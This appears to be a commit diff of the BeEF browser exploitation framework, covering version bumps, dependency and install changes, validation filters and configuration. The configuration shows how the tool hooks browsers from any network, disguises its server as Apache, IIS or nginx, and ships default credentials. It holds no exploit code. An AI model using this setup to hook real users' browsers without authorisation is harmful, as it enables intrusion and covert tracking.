Use filter

Add nginx imitation

Gemfile

@@ -1,37 +1,49 @@
 # BeEF's Gemfile
 
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-# Gems only required on Windows, or with specific Windows issues
-if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
-  gem "win32console"
-end
-
 gem "eventmachine", "1.0.3"
 gem "thin"
-gem "sinatra", "1.3.2"
-gem "em-websocket", "~> 0.3.6"
-gem "jsmin", "~> 1.0.1"
+gem "sinatra", "1.4.2"
+gem "rack", "1.5.2"
+gem "em-websocket", "~> 0.3.6" # WebSocket support
+gem "uglifier", "~> 2.2.1"
+
+# Windows support
+if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
+  # make sure you install this gem following https://github.com/hiranpeiris/therubyracer_for_windows
+  gem "therubyracer", "~> 0.11.0beta1"
+  gem "execjs"
+  gem "win32console"
+elsif !RUBY_PLATFORM.downcase.include?("darwin")
+  gem "therubyracer"
+  gem "execjs"
+end
+
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
 gem "json"
 gem "data_objects"
-gem "dm-sqlite-adapter"
+gem "dm-sqlite-adapter"  # SQLite support
+#gem dm-postgres-adapter # PostgreSQL support
+#gem dm-mysql-adapter    # MySQL support
 gem "parseconfig"
 gem "erubis"
 gem "dm-migrations"
-gem "msfrpc-client"
-
-# notifications
-gem "twitter"
+gem "msfrpc-client"        # Metasploit Integration extension
+#gem "twitter", ">= 5.0.0" # Twitter Notifications extension
+gem "rubyzip", ">= 1.0.0"
+gem "rubydns"              # DNS extension
+gem "sourcify"
+gem "geoip"                # geolocation support
 
+# For running unit tests
 if ENV['BEEF_TEST']
-# for running unit tests
   gem "test-unit"
   gem "test-unit-full"
   gem "curb"
@@ -42,7 +54,7 @@ if ENV['BEEF_TEST']
   # sudo apt-get install libxslt-dev libxml2-dev
   # sudo port install libxml2 libxslt
   gem "capybara"
-  #RESTful API tests/generic command module tests
+  # RESTful API tests/generic command module tests
   gem "rest-client", "~> 1.6.7"
 end
 

INSTALL.txt

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
@@ -26,11 +26,14 @@ Installation
 
       
    2. Prerequisites (Windows)
+
+      !!! This must be done PRIOR to running the bundle install command !!!
       
       Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
 
 	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
-      
+
+	  Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/hiranpeiris/therubyracer_for_windows.
 
    3. Prerequisites (Linux)
 
@@ -39,9 +42,9 @@ Installation
       On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
 
       3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
-      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
-      3.2. rvm install 1.9.2
-      3.3. rvm use 1.9.2
+      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatible and conflicting ruby packages that are required
+      3.2. rvm install 1.9.3-p484
+      3.3. rvm use 1.9.3
 	  
    4. Prerequisites (Mac OSX)
    
@@ -50,15 +53,15 @@ Installation
       - Ruby 1.9
       	To install RVM and Ruby 1.9.3 on Mac OS:  
       	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
-      	$ rvm install 1.9.3-p0 --with-gcc=clang
+      	$ rvm install 1.9.3-p484
 		$ rvm use 1.9.3
       
 
    5. Install instructions
    
-      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/zipball/master or cloning the GIT repo git@github.com:beefproject/beef.git
+      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/archive/master.zip or cloning the GIT repo https://github.com/beefproject/beef.git
 
-	  Navigate to the ruby source directory and run:
+	  Enter into the newly created BeEF directory, and type:
 
 	  bundle install
 
@@ -68,4 +71,4 @@ Installation
 
       Simply run:
 
-      ./beef
+      ./beef -x

README

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
@@ -35,24 +35,9 @@ Requirements
 ------------
 
 * OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [Ruby](http://rubylang.org) 1.9.2 or higher
 * [SQLite](http://sqlite.org) 3.x
-* The following GEMS: 
-   - bundler 
-   - thin
-   - Sinatra 
-   - ANSI 
-   - TERM-ANSIcolor 
-   - dm-core 
-   - json 
-   - data_objects 
-   - dm-sqlite-adapter 
-   - parseconfig 
-   - erubis 
-   - dm-migrations 
-   - msfrpc-client 
-   - eventmachine
-   - win32console (Windows Only)
+* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
 
 
 Quick Start
@@ -60,7 +45,8 @@ Quick Start
 
 __The following is for the impatient.__ 
 
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
+We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
 
    $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
 
@@ -68,7 +54,7 @@ For full installation details (including on Microsoft Windows), please refer to
 Usage 
 ----- 
 
-To get started, simply execute beef and follow the instrustions: 
+To get started, simply execute beef and follow the instructions:
 
    $ ./beef
 

README.mkd

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
@@ -35,24 +35,9 @@ Requirements
 ------------
 
 * OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [Ruby](http://rubylang.org) 1.9.2 or higher
 * [SQLite](http://sqlite.org) 3.x
-* The following GEMS: 
-   - bundler 
-   - thin
-   - Sinatra 
-   - ANSI 
-   - TERM-ANSIcolor 
-   - dm-core 
-   - json 
-   - data_objects 
-   - dm-sqlite-adapter 
-   - parseconfig 
-   - erubis 
-   - dm-migrations 
-   - msfrpc-client 
-   - eventmachine
-   - win32console (Windows Only)
+* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
 
 
 Quick Start
@@ -60,7 +45,8 @@ Quick Start
 
 __The following is for the impatient.__ 
 
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
+We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
 
        $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
 
@@ -72,3 +58,6 @@ To get started, simply execute beef and follow the instructions:
 
        $ ./beef
 
+On windows use
+
+      $ ruby beef

Rakefile

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -8,14 +8,14 @@ task :default => ["quick"]
 
 desc "Run quick tests"
 task :quick do
-  Rake::Task['unit'].invoke                 # run unit tests
+  Rake::Task['unit'].invoke # run unit tests
 end
 
 desc "Run all tests"
 task :all do
-  Rake::Task['integration'].invoke          # run integration tests
-  Rake::Task['unit'].invoke                 # run unit tests
-  Rake::Task['msf'].invoke                  # run msf tests
+  Rake::Task['integration'].invoke # run integration tests
+  Rake::Task['unit'].invoke # run unit tests
+  Rake::Task['msf'].invoke # run msf tests
 end
 
 desc "Run automated tests (for Jenkins)"
@@ -38,16 +38,16 @@ task :unit => ["install"] do
 end
 
 desc "Run MSF unit tests"
-task :msf => ["install", "msf_install"]  do
+task :msf => ["install", "msf_install"] do
   Rake::Task['msf_update'].invoke
   Rake::Task['msf_start'].invoke
   sh "cd test/thirdparty/msf/unit/;ruby -W0 ts_metasploit.rb"
   Rake::Task['msf_stop'].invoke
 end
 
-task :install do
-  sh "export BEEF_TEST=true;bundle install"
-end
+#task :install do
+#  sh "export BEEF_TEST=true"
+#end
 
 ################################
 # X11 set up
@@ -57,7 +57,7 @@ end
 task :xserver_start do
   printf "Starting X11 Server (wait 10 seconds)..."
   @xserver_process_id = IO.popen("/usr/bin/Xvfb :0 -screen 0 1024x768x24 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
   delays.each do |i| # delay for 10 seconds
     printf '.'
     sleep (i) # increase the . display rate
@@ -78,7 +78,7 @@ end
 task :beef_start => 'beef' do
   printf "Starting BeEF (wait a few seconds)..."
   @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays = [10, 10, 5, 5, 4, 4, 3, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
   delays.each do |i| # delay for a few seconds
     printf '.'
     sleep (i)
@@ -99,7 +99,7 @@ end
 task :msf_start => '/tmp/msf-test/msfconsole' do
   printf "Starting MSF (wait 45 seconds)..."
   @msf_process_id = IO.popen("/tmp/msf-test/msfconsole -r test/thirdparty/msf/unit/BeEF.rc 2> /dev/null", "w+")
-  delays = [10, 7, 6, 5, 4, 3, 2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays = [10, 7, 6, 5, 4, 3, 2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
   delays.each do |i| # delay for 45 seconds
     printf '.'
     sleep (i) # increase the . display rate
@@ -116,7 +116,7 @@ task :msf_install => '/tmp/msf-test/msfconsole' do
   # Handled by the 'test/msf-test/msfconsole' task.
 end
 
-task :msf_update  => '/tmp/msf-test/msfconsole' do
+task :msf_update => '/tmp/msf-test/msfconsole' do
   sh "cd /tmp/msf-test;git pull"
 end
 
@@ -159,10 +159,10 @@ task :cde do
   Rake::Task['cde_beef_start'].invoke
   Rake::Task['beef_stop'].invoke
   puts "\nCleaning Up...\n";
-  sleep (2);	
+  sleep (2);
   sh "rm -rf CDE";
   puts "\nCDE Package Created...\n";
- end
+end
 
 ################################
 # CDE/BeEF environment set up
@@ -172,7 +172,7 @@ task :cde do
 task :cde_beef_start => 'beef' do
   printf "Starting CDE BeEF (wait 10 seconds)..."
   @beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
   delays.each do |i| # delay for 10 seconds
     printf '.'
     sleep (i)

VERSION

@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.4.1-alpha
+0.4.5.0-alpha

beef

@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
+                     :port => config.get("beef.database.db_port"),
                      :username => config.get("beef.database.db_user"),
                      :password => config.get("beef.database.db_passwd"),
                      :database => config.get("beef.database.db_name"),

config.yaml

@@ -1,56 +1,84 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.4.1-alpha'
+    version: '0.4.5.0-alpha'
+    # More verbose messages (server-side)
     debug: false
+    # More verbose messages (client-side)
+    client_debug: false
+    # Used for generating secure tokens
+    crypto_default_value_length: 80
 
+    # Interface / IP restrictions
     restrictions:
-        # subnet of browser ip addresses that can hook to the framework
+        # subnet of IP addresses that can hook to the framework
         permitted_hooking_subnet: "0.0.0.0/0"
-        # subnet of browser ip addresses that can connect to the UI
-        # permitted_ui_subnet: "127.0.0.1/32"
+        # subnet of IP addresses that can connect to the admin UI
+        #permitted_ui_subnet: "127.0.0.1/32"
         permitted_ui_subnet: "0.0.0.0/0"
 
+    # HTTP server
     http:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
         port: "3000"
-        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
-        # It's not advised to decrease it with tons of hooked browsers (more than 50),
-        # because it might impact performance. Also, enable WebSockets is generally better.
+
+        # Decrease this setting to 1,000 (ms) if you want more responsiveness
+        #  when sending modules and retrieving results.
+        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
+        #  when hooking lots of browsers (50+).
+        # Enabling WebSockets is generally better (beef.websocket.enable)
         xhr_poll_timeout: 5000
-        # if running behind a nat set the public ip address here
-        #public: ""
-        #public_port: "" # port setting is experimental
-        dns: "localhost"
-        panel_path: "/ui/panel"
+
+        # Reverse Proxy / NAT
+        # If BeEF is running behind a reverse proxy or NAT
+        #  set the public hostname and port here
+        #public: ""      # public hostname/IP address
+        #public_port: "" # experimental
+
+        # DNS
+        dns_host: "localhost"
+        dns_port: 53
+
+        # Web Admin user interface URI
+        web_ui_basepath: "/ui"
+
+        # Hook
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
 
+        # Allow one or multiple origins to access the RESTful API using CORS
+        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
-          enable: false
-          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
-          port: 61985 # WS: good success rate through proxies
-          secure_port: 61986 # WSSecure
-          ws_poll_timeout: 1000 # poll BeEF every second
+            enable: false
+            port: 61985 # WS: good success rate through proxies
+            # Use encrypted 'WebSocketSecure'
+            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
+            secure: true
+            secure_port: 61986 # WSSecure
+            ws_poll_timeout: 1000 # poll BeEF every second
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
             enable: true
-            type: "apache" #supported: apache, iis
+            type: "apache" # Supported: apache, iis, nginx
 
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
 
@@ -72,12 +100,14 @@ beef:
 
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
+        db_port: 5432
         db_name: "beef"
         db_user: "beef"
         db_passwd: "beef123"
         db_encoding: "UTF-8"
 
-    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
+    # Credentials to authenticate in BeEF.
+    # Used by both the RESTful API and the Admin_UI extension
     credentials:
         user:   "beef"
         passwd: "beef"
@@ -86,14 +116,16 @@ beef:
     # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
     autorun:
         enable: true
-        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
+        # set this to TRUE if you want to allow auto-run execution for modules with target->user_notify
         allow_user_notify: true
 
-    crypto_default_value_length: 80
-
-    # Enable client-side debugging
-    client:
-        debug: false
+    # IP Geolocation
+    # NOTE: requires MaxMind database:
+    #   curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
+    #   gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
+    geoip:
+        enable: false
+        database: '/opt/GeoIP/GeoLiteCity.dat'
 
     # You may override default extension configuration parameters here
     extension:
@@ -112,3 +144,6 @@ beef:
                 enable: false
         ipec:
             enable: true
+        # this is still experimental, we're working on it..
+        dns:
+            enable: false

core/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -155,7 +155,7 @@ module BeEF
                 if not result == nil
                   data << {:api_id => mod[:id], :data => result}
                 end
-              rescue Exception => e
+              rescue => e
                 print_error "API Fire Error: #{e.message} in #{mod.to_s}.#{method.to_s}()"
               end
             end

core/api/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server/hook.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/module.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/bootstrap.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -45,6 +45,7 @@ require 'core/main/rest/handlers/modules'
 require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
+require 'core/main/rest/handlers/server'
 require 'core/main/rest/api'
 
 ## @note Include Websocket

core/core.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -37,4 +37,7 @@ require 'core/main/migration'
 require 'core/main/console/commandline'
 require 'core/main/console/banners'
 
+# @note Include rubyzip lib
+require 'zip'
+
 

core/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/base.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/browser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -12,7 +12,7 @@ module Filters
   def self.is_valid_browsername?(str)
     return false if not is_non_empty_string?(str)
     return false if str.length > 2
-    return false if has_non_printable_char?(str)  
+    return false if has_non_printable_char?(str)
     true
   end
 
@@ -22,7 +22,7 @@ module Filters
   def self.is_valid_browsertype?(str)
     return false if not is_non_empty_string?(str)
     return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 500 #CxF - had to increase this because the Chrome detection JSON String is getting bigger.
     return false if has_non_printable_char?(str)
     true
   end
@@ -32,7 +32,7 @@ module Filters
   # @return [Boolean] If the string has valid Operating System name characters
   def self.is_valid_osname?(str)
     return false if not is_non_empty_string?(str)
-    return false if has_non_printable_char?(str) 
+    return false if has_non_printable_char?(str)
     return false if str.length < 2
     true
   end
@@ -52,7 +52,7 @@ module Filters
   # @return [Boolean] If the string has valid browser version characters
   def self.is_valid_browserversion?(str)
     return false if not is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)  
+    return false if has_non_printable_char?(str)
     return true if str.eql? "UNKNOWN"
     return false if not nums_only?(str) and not is_valid_float?(str)  
     return false if str.length > 10      
@@ -64,7 +64,7 @@ module Filters
   # @return [Boolean] If the string has valid browser / ua string characters
   def self.is_valid_browserstring?(str)
     return false if not is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)    
+    return false if has_non_printable_char?(str)
     return false if str.length > 300      
     true
   end
@@ -73,7 +73,7 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid cookie characters
   def self.is_valid_cookies?(str)
-    return false if has_non_printable_char?(str)    
+    return false if has_non_printable_char?(str)
     return false if str.length > 2000
     true
   end
@@ -82,7 +82,7 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid screen size characters
   def self.is_valid_screen_size?(str)
-    return false if has_non_printable_char?(str)    
+    return false if has_non_printable_char?(str)
     return false if str.length > 200
     true
   end
@@ -91,7 +91,7 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid window size characters
   def self.is_valid_window_size?(str)
-    return false if has_non_printable_char?(str)    
+    return false if has_non_printable_char?(str)
     return false if str.length > 200
     true
   end
@@ -114,6 +114,16 @@ module Filters
     true
   end
 
+  # Verify the CPU type string is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid CPU type characters
+  def self.is_valid_cpu?(str)
+    return false if not is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length > 200
+    true
+  end
+
   # Verify the browser_plugins string is valid
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid browser plugin characters
@@ -123,9 +133,9 @@ module Filters
     return true if not is_non_empty_string?(str)
     return false if str.length > 1000
     if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
     else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
     end
   end
 

core/filters/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/http.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/page.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -12,7 +12,7 @@ module Filters
   def self.is_valid_pagetitle?(str)
     return false if not str.is_a? String
     return false if has_non_printable_char?(str)
-    return false if str.length > 50      
+    return false if str.length > 500 # CxF Increased this because some page titles are MUCH longer
     true
   end
 

core/hbmanager.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/loader.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -15,6 +15,8 @@ require 'ipaddr'
 require 'base64'
 require 'xmlrpc/client'
 require 'openssl'
+require 'rubydns'
+require 'sourcify'
 
 # @note Include the filters
 require 'core/filters'
@@ -29,4 +31,4 @@ require 'core/api'
 require 'core/settings'
 
 # @note Include the core of BeEF
-require 'core/core'
+require 'core/core'

core/main/client/are.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/beef.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/browser/cookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/browser/popup.js

@@ -1,5 +1,5 @@
 //
